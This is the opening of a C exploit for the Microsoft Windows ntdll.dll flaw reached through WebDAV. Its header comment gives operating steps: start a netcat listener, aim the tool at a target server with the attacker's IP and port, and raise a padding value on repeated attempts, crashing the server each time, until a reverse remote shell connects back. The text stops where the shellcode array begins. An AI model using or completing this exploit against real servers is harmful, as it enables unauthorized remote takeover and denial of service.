Microsoft Windows ntdll.dll exploit through WebDAV

/*******************************************************************/
/* [Crpt] ntdll.dll exploit through WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/*******************************************************************/


#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

char shellc0de[] =